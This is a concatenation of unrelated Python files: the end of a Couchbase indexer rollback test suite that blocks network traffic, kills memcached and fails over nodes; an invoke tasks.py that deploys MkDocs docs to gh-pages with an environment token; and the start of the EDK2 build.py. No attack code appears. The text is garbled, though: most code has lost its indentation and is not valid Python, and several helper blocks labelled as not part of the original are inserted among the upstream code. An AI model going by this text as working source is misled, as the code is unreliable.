self.block_incoming_network_from_node(node_b, node_c)
# Doing some mutation which replica on Node C won't see
gens_load = self.generate_docs(num_items=self.docs_per_day * 5)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
# Killing memcached on node C
remote_client = RemoteMachineShellConnection(node_c)
remote_client.kill_memcached()
remote_client.disconnect()
# Failing over Node C
num_rollback = conn.get_num_rollback_stat(bucket=bucket_name)
self.cluster.failover(servers=self.servers, failover_nodes=[node_c])
sleep_count = 0
while sleep_count < 10:
self.sleep(10, "Waiting for Disk Snapshot/s to be available")
new_num_rollback = conn.get_num_rollback_stat(bucket=bucket_name)
if new_num_rollback == num_rollback + 1:
self.log.info("Rollbacked to Disk Snapshot")
break
sleep_count += 1
self.assertNotEqual(sleep_count, 10, "Indexer failed to rollback")
# Todo: add the assert to check the rollback happened from disk snapshot not from zero
finally:
self.resume_blocked_incoming_network_from_node(node_b, node_c)
def test_restart_timestamp_calculation_for_rollback(self):
"""
MB-35880
Case B:
Can't reproduce it consistently
"""
data_nodes = self.get_kv_nodes()
self.assertTrue(len(data_nodes) >= 3, "Can't run this with less than 3 KV nodes")
# Deleting bucket as there is no easy way in testrunner to create index before loading data
for bucket in self.buckets:
self.cluster.bucket_delete(self.master, bucket=bucket)
# Create default bucket
default_params = self._create_bucket_params(
server=self.master, size=self.bucket_size,
replicas=self.num_replicas, bucket_type=self.bucket_type,
enable_replica_index=self.enable_replica_index,
eviction_policy=self.eviction_policy, lww=self.lww,
maxttl=self.maxttl, compression_mode=self.compression_mode)
self.cluster.create_default_bucket(default_params)
# creating Index idx_0
query_definition = QueryDefinition(index_name="idx_0", index_fields=["VMs"], query_template="SELECT * FROM %s ",
groups=["simple"], index_where_clause=" VMs IS NOT NULL ")
self.load_query_definitions.append(query_definition)
self.create_index(bucket="default", query_definition=query_definition)
# loading data to bucket
gens_load = self.generate_docs(num_items=self.docs_per_day)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
# creating few more indexes
for item in range(1, 4):
query_definition = QueryDefinition(index_name="idx_{0}".format(item), index_fields=["VMs"],
query_template="SELECT * FROM %s ", groups=["simple"],
index_where_clause=" VMs IS NOT NULL ")
self.load_query_definitions.append(query_definition)
self.create_index(bucket="default", query_definition=query_definition)
# Checking item_count in all indexes
self.sleep(timeout=10, message="Allowing indexes to index all item in bucket")
rest = RestConnection(self.master)
for item in range(4):
indexed_item = rest.get_index_stats()["default"]["idx_{0}".format(item)]["items_count"]
self.assertEqual(indexed_item, self.docs_per_day * 2016, "Failed to index all the item in bucket")
data_nodes = self.get_kv_nodes()
node_b, node_c = (None, None)
for node in data_nodes:
if node.ip == self.master.ip:
continue
if not node_b:
node_b = node
else:
node_c = node
break
try:
# Blocking communication between Node B and Node C
self.block_incoming_network_from_node(node_b, node_c)
# Mutating docs so that the replica on Node C doesn't see changes on Node B
gens_load = self.generate_docs(num_items=self.docs_per_day)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
# killing Memcached on Node B
remote_client = RemoteMachineShellConnection(node_b)
remote_client.kill_memcached()
remote_client.disconnect()
# Failing over Node B
self.cluster.failover(servers=self.servers, failover_nodes=[node_b])
self.sleep(timeout=10, message="Allowing indexer to rollback")
# Validating that indexer has indexed item after rollback and catch up with items in bucket
for item in range(4):
indexed_item = rest.get_index_stats()["default"]["idx_{0}".format(item)]["items_count"]
self.assertEqual(indexed_item, self.docs_per_day * 2016, "Index {} has failed to index items after"
" rollback")
finally:
self.resume_blocked_incoming_network_from_node(node_b, node_c)
def test_recover_index_from_in_memory_snapshot(self):
"""
MB-32102
MB-35663
"""
bucket_name = self.buckets[0].name
index_name = list(self.get_index_map()[bucket_name])[0]
# Blocking node B firewall
data_nodes = self.get_kv_nodes()
self.assertTrue(len(data_nodes) >= 3, "Can't run this with less than 3 KV nodes")
node_b, node_c = (None, None)
for node in data_nodes:
if node.ip == self.master.ip:
continue
if not node_b:
node_b = node
else:
node_c = node
break
# get num_rollback stats before triggering in-memory recovery
conn = RestConnection(self.master)
num_rollback_before_recovery = conn.get_num_rollback_stat(bucket=bucket_name)
try:
self.block_incoming_network_from_node(node_b, node_c)
# killing Memcached on Node B
remote_client = RemoteMachineShellConnection(node_b)
remote_client.kill_memcached()
remote_client.disconnect()
# Failing over Node B
self.cluster.failover(servers=self.servers, failover_nodes=[node_b])
finally:
# resume the communication between node B and node C
self.resume_blocked_incoming_network_from_node(node_b, node_c)
# get num_rollback stats after in-memory recovery of indexes
num_rollback_after_recovery = conn.get_num_rollback_stat(bucket=bucket_name)
self.assertEqual(num_rollback_before_recovery, num_rollback_after_recovery,
"Recovery didn't happen from in-memory snapshot")
self.log.info("Node has recovered from in-memory snapshots")
# Loading few more docs so that indexer will index updated as well as new docs
gens_load = self.generate_docs(num_items=self.docs_per_day * 2)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
use_index_query = "select Count(*) from {0} USE INDEX ({1})".format(bucket_name, index_name)
result = self.n1ql_helper.run_cbq_query(query=use_index_query, server=self.n1ql_node,
scan_consistency=CONSISTENCY_REQUEST)["results"][0]["$1"]
expected_result = self.docs_per_day * 2 * 2016
self.assertEqual(result, expected_result, "Indexer hasn't recovered properly from in-memory as"
" indexes haven't catch up with "
"request_plus/consistency_request")
self.log.info("Indexer continues to index as expected")
def test_partial_rollback(self):
self.multi_create_index()
self.sleep(30)
self.log.info("Stopping persistence on NodeA & NodeB")
data_nodes = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=True)
for data_node in data_nodes:
for bucket in self.buckets:
mem_client = MemcachedClientHelper.direct_client(data_node, bucket.name)
mem_client.stop_persistence()
self.run_doc_ops()
self.sleep(10)
# Get count before rollback
bucket_before_item_counts = {}
for bucket in self.buckets:
bucket_count_before_rollback = self.get_item_count(self.master, bucket.name)
bucket_before_item_counts[bucket.name] = bucket_count_before_rollback
log.info("Items in bucket {0} before rollback = {1}".format(
bucket.name, bucket_count_before_rollback))
# Index rollback count before rollback
self._verify_bucket_count_with_index_count()
self.multi_query_using_index()
# Kill memcached on Node A so that Node B becomes master
self.log.info("Kill Memcached process on NodeA")
shell = RemoteMachineShellConnection(data_nodes[0])
shell.kill_memcached()
# Start persistence on Node B
self.log.info("Starting persistence on NodeB")
for bucket in self.buckets:
mem_client = MemcachedClientHelper.direct_client(data_nodes[1], bucket.name)
mem_client.start_persistence()
# Failover Node B
self.log.info("Failing over NodeB")
self.sleep(10)
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init], [data_nodes[1]], self.graceful,
wait_for_pending=120)
failover_task.result()
# Wait for a couple of mins to allow rollback to complete
# self.sleep(120)
bucket_after_item_counts = {}
for bucket in self.buckets:
bucket_count_after_rollback = self.get_item_count(self.master, bucket.name)
bucket_after_item_counts[bucket.name] = bucket_count_after_rollback
log.info("Items in bucket {0} after rollback = {1}".format(
bucket.name, bucket_count_after_rollback))
for bucket in self.buckets:
if bucket_after_item_counts[bucket.name] == bucket_before_item_counts[bucket.name]:
log.info("Looks like KV rollback did not happen at all.")
self._verify_bucket_count_with_index_count()
self.multi_query_using_index()
def _create_replica_indexes(self):
query_definitions = []
if not self.use_replica:
return []
if not self.index_nodes_out:
return []
index_nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
for node in self.index_nodes_out:
if node in index_nodes:
index_nodes.remove(node)
if index_nodes:
ops_map = self.generate_operation_map("in_between")
if ("create_index" not in ops_map):
indexes_lost = self._find_index_lost_when_indexer_down()
deploy_node_info = ["{0}:{1}".format(index_nodes[0].ip,
index_nodes[0].port)]
for query_definition in self.query_definitions:
if query_definition.index_name in indexes_lost:
query_definition.index_name = query_definition.index_name + "_replica"
query_definitions.append(query_definition)
for bucket in self.buckets:
self.create_index(bucket=bucket,
query_definition=query_definition,
deploy_node_info=deploy_node_info)
else:
query_definitions.append(query_definition)
self.query_definitions = query_definitions
def _find_index_lost_when_indexer_down(self):
lost_indexes = []
rest = RestConnection(self.master)
index_map = rest.get_index_status()
log.info("index_map: {0}".format(index_map))
for index_node in self.index_nodes_out:
host = "{0}:8091".format(index_node.ip)
for index in index_map.values():
for keys, vals in index.items():
if vals["hosts"] == host:
lost_indexes.append(keys)
log.info("Lost Indexes: {0}".format(lost_indexes))
return lost_indexes
def _run_kvops_tasks(self):
tasks_ops = []
if self.doc_ops:
tasks_ops = self.async_run_doc_ops()
return tasks_ops
def _run_tasks(self, tasks_list):
for tasks in tasks_list:
for task in tasks:
task.result()
|
tasks.py
|
import os
import threading
from invoke import run, task, util
API_REFERENCE_CONFIG = {
'client': ['auth'],
'session_client': [
'user',
'projects',
'project',
'use_project'
],
'project_client': [
'info',
'collections',
'collection',
'documents',
'document',
]
}
@task(name='deploy-docs')
def deploy_docs():
"""
Based on https://gist.github.com/domenic/ec8b0fc8ab45f39403dd
"""
run('rm -rf ./site/')
build_docs()
with util.cd('./site/'):
run('git init')
run('echo "*.pyc" > .gitignore')
run('git config user.name "Travis CI"')
run('git config user.email "%s"' % os.environ['EMAIL'])
run('git add .')
run('git commit -m "Deploy to GitHub Pages"')
run(
'git push --force --quiet "https://{GH_TOKEN}@{GH_REF}" '
'master:gh-pages > /dev/null 2>&1'.format(
GH_TOKEN=os.environ['GH_TOKEN'],
GH_REF=os.environ['GH_REF'],
)
)
@task(name='build-docs')
def build_docs():
generate_api_reference()
run('mkdocs build')
@task(name='serve-docs')
def serve_docs():
generate_api_reference()
target_cmd = (
'watchmedo shell-command -R -c '
'"invoke generate-api-reference" pydeform docs'
)
p = threading.Thread(target=run, args=(target_cmd,))
p.daemon = True
p.start()
run('mkdocs serve')
@task(name='generate-api-reference')
def generate_api_reference():
from docs.generator import generate_api_reference
print 'Generating API reference'
generate_api_reference()
|
build.py
|
## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2017, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Common.LongFilePathOs as os
import re
import StringIO
import sys
import glob
import time
import platform
import traceback
import encodings.ascii
import itertools
from struct import *
from threading import *
import threading
from optparse import OptionParser
from subprocess import *
from Common import Misc as Utils
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.LongFilePathSupport import LongFilePath
from Common.TargetTxtClassObject import *
from Common.ToolDefClassObject import *
from Common.DataType import *
from Common.BuildVersion import gBUILD_VERSION
from AutoGen.AutoGen import *
from Common.BuildToolError import *
from Workspace.WorkspaceDatabase import *
from Common.MultipleWorkspace import MultipleWorkspace as mws
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import *
from PatchPcdValue.PatchPcdValue import *
import Common.EdkLogger
import Common.GlobalData as GlobalData
# Version and Copyright
VersionNumber = "0.60" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + VersionNumber
__copyright__ = "Copyright (c) 2007 - 2017, Intel Corporation All rights reserved."
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
if os.environ.has_key('PATHEXT'):
extns = os.environ['PATHEXT'].split(os.path.pathsep)
else:
extns = ('',)
for pathDir in os.environ['PATH'].split(os.path.pathsep):
for ext in extns:
if os.path.exists(os.path.join(pathDir, tool + ext)):
return True
return False
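## Illustrative usage (not part of the original build.py): IsToolInPath() is a
#  plain PATH lookup that honours PATHEXT on Windows, so a query for "nmake"
#  also matches "nmake.exe" there. The tool names below are hypothetical
#  examples, not tools required by the build system.
#
def _ExampleCheckBuildTools():
    for Tool in ("make", "gcc"):
        if not IsToolInPath(Tool):
            EdkLogger.quiet("%s was not found in PATH" % Tool)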
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory contains all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of above environment variable is not set or has error, the build
# will be broken.
#
def CheckEnvVariable():
# check WORKSPACE
if "WORKSPACE" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
if not os.path.exists(WorkspaceDir):
EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData="%s" % WorkspaceDir)
elif ' ' in WorkspaceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
ExtraData=WorkspaceDir)
os.environ["WORKSPACE"] = WorkspaceDir
# set multiple workspace
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(WorkspaceDir, PackagesPath)
if mws.PACKAGES_PATH:
for Path in mws.PACKAGES_PATH:
if not os.path.exists(Path):
EdkLogger.error("build", FILE_NOT_FOUND, "One Path in PACKAGES_PATH doesn't exist", ExtraData="%s" % Path)
elif ' ' in Path:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in PACKAGES_PATH", ExtraData=Path)
#
# Check EFI_SOURCE (Edk build convention). EDK_SOURCE will always point to ECP
#
if "ECP_SOURCE" not in os.environ:
os.environ["ECP_SOURCE"] = mws.join(WorkspaceDir, GlobalData.gEdkCompatibilityPkg)
if "EFI_SOURCE" not in os.environ:
os.environ["EFI_SOURCE"] = os.environ["ECP_SOURCE"]
if "EDK_SOURCE" not in os.environ:
os.environ["EDK_SOURCE"] = os.environ["ECP_SOURCE"]
#
# Unify case of characters on case-insensitive systems
#
EfiSourceDir = os.path.normcase(os.path.normpath(os.environ["EFI_SOURCE"]))
EdkSourceDir = os.path.normcase(os.path.normpath(os.environ["EDK_SOURCE"]))
EcpSourceDir = os.path.normcase(os.path.normpath(os.environ["ECP_SOURCE"]))
os.environ["EFI_SOURCE"] = EfiSourceDir
os.environ["EDK_SOURCE"] = EdkSourceDir
os.environ["ECP_SOURCE"] = EcpSourceDir
os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
if not os.path.exists(EcpSourceDir):
EdkLogger.verbose("ECP_SOURCE = %s doesn't exist. Edk modules could not be built." % EcpSourceDir)
elif ' ' in EcpSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in ECP_SOURCE path",
ExtraData=EcpSourceDir)
if not os.path.exists(EdkSourceDir):
if EdkSourceDir == EcpSourceDir:
EdkLogger.verbose("EDK_SOURCE = %s doesn't exist. Edk modules could not be built." % EdkSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE does not exist",
ExtraData=EdkSourceDir)
elif ' ' in EdkSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EDK_SOURCE path",
ExtraData=EdkSourceDir)
if not os.path.exists(EfiSourceDir):
if EfiSourceDir == EcpSourceDir:
EdkLogger.verbose("EFI_SOURCE = %s doesn't exist. Edk modules could not be built." % EfiSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE does not exist",
ExtraData=EfiSourceDir)
elif ' ' in EfiSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EFI_SOURCE path",
ExtraData=EfiSourceDir)
# check those variables on single workspace case
if not PackagesPath:
# change absolute path to relative path to WORKSPACE
if EfiSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EFI_SOURCE = %s" % (WorkspaceDir, EfiSourceDir))
if EdkSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EDK_SOURCE = %s" % (WorkspaceDir, EdkSourceDir))
if EcpSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "ECP_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n ECP_SOURCE = %s" % (WorkspaceDir, EcpSourceDir))
# check EDK_TOOLS_PATH
if "EDK_TOOLS_PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="EDK_TOOLS_PATH")
# check PATH
if "PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="PATH")
GlobalData.gWorkspace = WorkspaceDir
GlobalData.gEfiSource = EfiSourceDir
GlobalData.gEdkSource = EdkSourceDir
GlobalData.gEcpSource = EcpSourceDir
GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
GlobalData.gGlobalDefines["EFI_SOURCE"] = EfiSourceDir
GlobalData.gGlobalDefines["EDK_SOURCE"] = EdkSourceDir
GlobalData.gGlobalDefines["ECP_SOURCE"] = EcpSourceDir
GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
# check if the path is absolute or relative
if os.path.isabs(FilePath):
FileFullPath = os.path.normpath(FilePath)
else:
FileFullPath = os.path.normpath(mws.join(Workspace, FilePath))
Workspace = mws.getWs(Workspace, FilePath)
# check if the file path exists or not
if not os.path.isfile(FileFullPath):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
# remove workspace directory from the beginning part of the file path
if Workspace[-1] in ["\\", "/"]:
return FileFullPath[len(Workspace):]
else:
return FileFullPath[(len(Workspace) + 1):]
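## Illustrative example (not part of the original build.py): expected NormFile()
#  behaviour for a hypothetical single-workspace layout. Both paths below are
#  made-up values used only to show the absolute-to-relative conversion;
#  NormFile() raises a build error if the file does not actually exist.
#
def _ExampleNormFile():
    Workspace = "/work/edk2"                     # hypothetical WORKSPACE
    FullPath = "/work/edk2/MdePkg/MdePkg.dec"    # file given as a full path
    # The workspace prefix is stripped, yielding "MdePkg/MdePkg.dec". A relative
    # input would first be joined with the workspace (or a PACKAGES_PATH entry)
    # and then checked for existence.
    return NormFile(FullPath, Workspace)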
## Get the output of an external program
#
# This is the entrance method of thread reading output of an external program and
# putting them in STDOUT/STDERR of current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line != None and Line != "":
To(Line.rstrip())
else:
break
if ExitFlag.isSet():
break
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir):
# if working directory doesn't exist, Popen() will raise an exception
if not os.path.isdir(WorkingDir):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
# Command is used as the first argument in the following Popen().
# It could be a string or a sequence. We find that if Command is passed as a string
# to the following Popen(), Ubuntu may fail with an error saying the command is not found.
# So here we may need to convert Command from a string to a list instance.
if platform.system() != 'Windows':
if not isinstance(Command, list):
Command = Command.split()
Command = ' '.join(Command)
Proc = None
EndOfProcedure = None
try:
# launch the command
Proc = Popen(Command, stdout=PIPE, stderr=PIPE, env=os.environ, cwd=WorkingDir, bufsize=-1, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Proc.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Proc.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Proc.wait()
except: # in case of aborting
# terminate the threads redirecting the program output
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
if EndOfProcedure != None:
EndOfProcedure.set()
if Proc == None:
if type(Command) != type(""):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
if Proc.stdout:
StdOutThread.join()
if Proc.stderr:
StdErrThread.join()
# check the return code of the program
if Proc.returncode != 0:
if type(Command) != type(""):
Command = " ".join(Command)
# print out the Response file and its content when make failure
RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
if os.path.isfile(RespFile):
f = open(RespFile)
RespContent = f.read()
f.close()
EdkLogger.info(RespContent)
EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise some build units could
# be missed during the build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
## The constructor
#
# @param self The object pointer
# @param Obj The object the build is working on
# @param Target The build target name, one of gSupportedTarget
# @param Dependency The BuildUnit(s) which must be completed in advance
# @param WorkingDir The directory build command starts in
#
def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
self.BuildObject = Obj
self.Dependency = Dependency
self.WorkingDir = WorkingDir
self.Target = Target
self.BuildCommand = BuildCommand
if not BuildCommand:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
ExtraData=str(Obj))
## str() method
#
# It just returns the string representation of self.BuildObject
#
# @param self The object pointer
#
def __str__(self):
return str(self.BuildObject)
## "==" operator method
#
# It just compares self.BuildObject with "Other". So self.BuildObject must
# provide its own __eq__() method.
#
# @param self The object pointer
# @param Other The other BuildUnit object compared to
#
def __eq__(self, Other):
return Other != None and self.BuildObject == Other.BuildObject \
and self.BuildObject.Arch == Other.BuildObject.Arch
## hash() method
#
# It just returns the hash value of self.BuildObject which must be hashable.
#
# @param self The object pointer
#
def __hash__(self):
return hash(self.BuildObject) + hash(self.BuildObject.Arch)
def __repr__(self):
return repr(self.BuildObject)
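## Illustrative sketch (not part of the original build.py): a minimal object
#  satisfying the "Obj" contract documented above -- __str__(), __eq__() and
#  __hash__(), plus the Arch attribute BuildUnit uses for equality and hashing.
#  Real builds always pass ModuleAutoGen or PlatformAutoGen instances instead.
#
class _ExampleBuildObject(object):
    def __init__(self, Name, Arch):
        self.Name = Name
        self.Arch = Arch
    def __str__(self):
        return self.Name
    def __eq__(self, Other):
        return Other != None and self.Name == getattr(Other, "Name", None) \
               and self.Arch == getattr(Other, "Arch", None)
    def __hash__(self):
        return hash(self.Name) + hash(self.Arch)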
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise some make
# units could be missed during the build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The ModuleAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(La, Target) for La in Obj.LibraryAutoGenList]
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
if Target in [None, "", "all"]:
self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise some make
# units could be missed during the build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The PlatformAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(Lib, Target) for Lib in Obj.LibraryAutoGenList]
Dependency.extend([ModuleMakeUnit(Mod, Target) for Mod in Obj.ModuleAutoGenList])
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
# queue for tasks waiting for schedule
_PendingQueue = sdict()
_PendingQueueLock = threading.Lock()
# queue for tasks ready for running
_ReadyQueue = sdict()
_ReadyQueueLock = threading.Lock()
# queue for run tasks
_RunningQueue = sdict()
_RunningQueueLock = threading.Lock()
# queue containing all build tasks, in case duplicate build
_TaskQueue = sdict()
# flag indicating error occurs in a running thread
_ErrorFlag = threading.Event()
_ErrorFlag.clear()
_ErrorMessage = ""
# BoundedSemaphore object used to control the number of running threads
_Thread = None
# flag indicating if the scheduler is started or not
_SchedulerStopped = threading.Event()
_SchedulerStopped.set()
## Start the task scheduler thread
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def StartScheduler(MaxThreadNumber, ExitFlag):
SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
SchedulerThread.setName("Build-Task-Scheduler")
SchedulerThread.setDaemon(False)
SchedulerThread.start()
# wait for the scheduler to be started, especially useful in Linux
while not BuildTask.IsOnGoing():
time.sleep(0.01)
## Scheduler method
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def Scheduler(MaxThreadNumber, ExitFlag):
BuildTask._SchedulerStopped.clear()
try:
# use BoundedSemaphore to control the maximum running threads
BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
#
# scheduling loop, which will exit when there is no pending/ready task and it
# is indicated to do so, or when an error occurs in a running thread
#
while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
or not ExitFlag.isSet()) and not BuildTask._ErrorFlag.isSet():
EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
% (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
# get all pending tasks
BuildTask._PendingQueueLock.acquire()
BuildObjectList = BuildTask._PendingQueue.keys()
#
# check if their dependency is resolved, and if true, move them
# into ready queue
#
for BuildObject in BuildObjectList:
Bt = BuildTask._PendingQueue[BuildObject]
if Bt.IsReady():
BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
BuildTask._PendingQueueLock.release()
# launch build thread until the maximum number of threads is reached
while not BuildTask._ErrorFlag.isSet():
# empty ready queue, do nothing further
if len(BuildTask._ReadyQueue) == 0:
break
# wait for active thread(s) exit
BuildTask._Thread.acquire(True)
# start a new build thread
Bo = BuildTask._ReadyQueue.keys()[0]
Bt = BuildTask._ReadyQueue.pop(Bo)
# move into running queue
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue[Bo] = Bt
BuildTask._RunningQueueLock.release()
Bt.Start()
# avoid tense loop
time.sleep(0.01)
# avoid tense loop
time.sleep(0.01)
# wait for all running threads exit
if BuildTask._ErrorFlag.isSet():
EdkLogger.quiet("\nWaiting for all build threads exit...")
# while not BuildTask._ErrorFlag.isSet() and \
while len(BuildTask._RunningQueue) > 0:
EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join([Th.getName() for Th in threading.enumerate()]))
# avoid tense loop
time.sleep(0.1)
except BaseException, X:
#
# TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
BuildTask._PendingQueue.clear()
BuildTask._ReadyQueue.clear()
BuildTask._RunningQueue.clear()
BuildTask._TaskQueue.clear()
BuildTask._SchedulerStopped.set()
## Wait for all running method exit
#
@staticmethod
def WaitForComplete():
BuildTask._SchedulerStopped.wait()
## Check if the scheduler is running or not
#
@staticmethod
def IsOnGoing():
return not BuildTask._SchedulerStopped.isSet()
## Abort the build
@staticmethod
def Abort():
if BuildTask.IsOnGoing():
BuildTask._ErrorFlag.set()
BuildTask.WaitForComplete()
## Check if there's error in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use threading.Event to communicate this information to the main thread.
#
@staticmethod
def HasError():
return BuildTask._ErrorFlag.isSet()
## Get error message in running thread
#
